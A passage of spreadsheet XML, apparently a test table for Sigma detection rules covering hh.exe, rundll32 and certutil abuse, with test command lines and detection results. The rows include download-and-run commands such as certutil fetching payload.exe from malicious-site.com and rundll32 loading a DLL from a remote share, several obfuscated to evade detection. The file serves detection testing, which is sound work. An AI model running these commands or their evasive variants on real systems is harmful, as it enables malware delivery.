      </c>
      <c r="G3282" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3282" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3282" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3282" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3282" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3283" ht="15.75" customHeight="1" s="42">
      <c r="A3283" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3283" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3283" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3283" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3283" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3283" s="43" t="n"/>
      <c r="J3283" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3283" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3284" ht="15.75" customHeight="1" s="42">
      <c r="A3284" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3284" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3284" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3284" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3284" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3284" s="43" t="n"/>
      <c r="J3284" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3284" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3285" ht="15.75" customHeight="1" s="42">
      <c r="A3285" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3285" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3285" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3285" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3285" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F3285" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3285" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3285" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3285" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3285" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3285" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3286" ht="15.75" customHeight="1" s="42">
      <c r="A3286" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3286" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3286" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3286" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3286" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F3286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3286" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3286" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3286" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3286" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3287" ht="15.75" customHeight="1" s="42">
      <c r="A3287" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3287" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3287" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3287" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3287" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F3287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3287" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3287" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3287" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3287" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3288" ht="15.75" customHeight="1" s="42">
      <c r="A3288" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3288" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3288" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3288" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3288" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F3288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3288" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3288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288" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3288" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3289" ht="15.75" customHeight="1" s="42">
      <c r="A3289" s="43" t="n"/>
      <c r="B3289" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3289" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3289" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3289" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\temp\custom_module.dll,Main</t>
        </is>
      </c>
      <c r="F3289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3289" s="44" t="n"/>
      <c r="J3289" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3289" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3290" ht="15.75" customHeight="1" s="42">
      <c r="A3290" s="43" t="n"/>
      <c r="B3290" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3290" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3290" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3290" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F3290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3290" s="44" t="n"/>
      <c r="J3290" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3290" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3291" ht="15.75" customHeight="1" s="42">
      <c r="A3291" s="43" t="n"/>
      <c r="B3291" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3291" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3291" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3291" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" C:\Windows\Temp\t^m^p.bat</t>
        </is>
      </c>
      <c r="F3291" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3291" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3291" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3291" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution (95022b85-ff2a-49fa-939a-d7b8f56eeb9b)</t>
        </is>
      </c>
      <c r="J3291" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3291" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3292" ht="15.75" customHeight="1" s="42">
      <c r="A3292" s="43" t="n"/>
      <c r="B3292" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C3292" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D3292" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E3292" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\GTHREA~1.DLL,EntryPoint</t>
        </is>
      </c>
      <c r="F3292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3292" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3292" s="43" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J3292" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3292" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3293" ht="15.75" customHeight="1" s="42">
      <c r="A3293" s="43" t="n"/>
      <c r="B3293" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C3293" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D3293" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E3293" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe oledb32.dll,OpenDSLFile C:\Users\user\Downloads\test.udl</t>
        </is>
      </c>
      <c r="F3293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3293" s="44" t="n"/>
      <c r="J3293" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3293" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3294" ht="15.75" customHeight="1" s="42">
      <c r="A3294" s="43" t="n"/>
      <c r="B3294" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C3294" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D3294" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E3294" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile "C:\Users\admin\Downloads\test.udl"</t>
        </is>
      </c>
      <c r="F3294" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3294" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3294" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3294" s="43" t="n"/>
      <c r="J3294" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3294" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3295" ht="15.75" customHeight="1" s="42">
      <c r="A3295" s="43" t="n"/>
      <c r="B3295" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C3295" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D3295" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E3295" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile C:\ProgramData\test.udl</t>
        </is>
      </c>
      <c r="F3295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3295" s="43" t="n"/>
      <c r="J3295" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3295" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3296" ht="15.75" customHeight="1" s="42">
      <c r="A3296" s="43" t="n"/>
      <c r="B3296" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C3296" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D3296" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E3296" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.100/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F3296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3296" s="44" t="n"/>
      <c r="J3296" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3296" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3297" ht="15.75" customHeight="1" s="42">
      <c r="A3297" s="43" t="n"/>
      <c r="B3297" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C3297" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D3297" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E3297" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F3297" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3297" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3297" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3297" s="44" t="n"/>
      <c r="J3297" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3297" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3298" ht="15.75" customHeight="1" s="42">
      <c r="A3298" s="43" t="n"/>
      <c r="B3298" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C3298" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D3298" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E3298" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe /"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F3298" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3298" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3298" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3298" s="44" t="n"/>
      <c r="J3298" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3298" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3299" ht="15.75" customHeight="1" s="42">
      <c r="A3299" s="43" t="n"/>
      <c r="B3299" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C3299" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D3299" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E3299" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe -"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F3299" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3299" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3299" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3299" s="43" t="n"/>
      <c r="J3299" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3299" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3300" ht="15.75" customHeight="1" s="42">
      <c r="A3300" s="43" t="n"/>
      <c r="B3300" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C3300" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D3300" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E3300" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/SHAre/pAYLOAd.Dll,enTrypoiNT</t>
        </is>
      </c>
      <c r="F3300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3300" s="43" t="n"/>
      <c r="J3300" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3300" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3301" ht="15.75" customHeight="1" s="42">
      <c r="A3301" s="43" t="n"/>
      <c r="B3301" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C3301" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D3301" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E3301" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/shAre/PaylOAD.dLl,EnTRYPOInt</t>
        </is>
      </c>
      <c r="F3301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3301" s="43" t="n"/>
      <c r="J3301" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3301" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3302" ht="15.75" customHeight="1" s="42">
      <c r="A3302" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3302" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3302" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3302" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3302" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3302" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3302" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3302" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3302" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J3302" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3302" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3303" ht="15.75" customHeight="1" s="42">
      <c r="A3303" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3303" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3303" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3303" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3303" s="44" t="inlineStr">
        <is>
          <t>certutil -uRLCAcHE /"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3303" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3303" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3303" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J3303" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3303" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3304" ht="15.75" customHeight="1" s="42">
      <c r="A3304" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3304" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3304" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3304" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3304" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3304" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3304" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3304" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3304" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J3304" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3304" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3305" ht="15.75" customHeight="1" s="42">
      <c r="A3305" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3305" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3305" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3305" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3305" s="44" t="inlineStr">
        <is>
          <t>certutil -uRLcAChE -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3305" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3305" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3305" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J3305" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3305" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3306" ht="15.75" customHeight="1" s="42">
      <c r="A3306" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3306" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3306" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3306" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3306" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3306" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3306" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3306" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J3306" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3306" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3307" ht="15.75" customHeight="1" s="42">
      <c r="A3307" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3307" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3307" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3307" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3307" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -sPlIt -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3307" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3307" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3307" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J3307" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3307" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3308" ht="15.75" customHeight="1" s="42">
      <c r="A3308" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3308" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3308" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3308" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3308" s="44" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F3308" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3308" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3308" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3308" s="44" t="n"/>
      <c r="J3308" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3308" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3309" ht="15.75" customHeight="1" s="42">
      <c r="A3309" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B3309" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3309" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3309" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3309" s="44" t="inlineStr">
        <is>
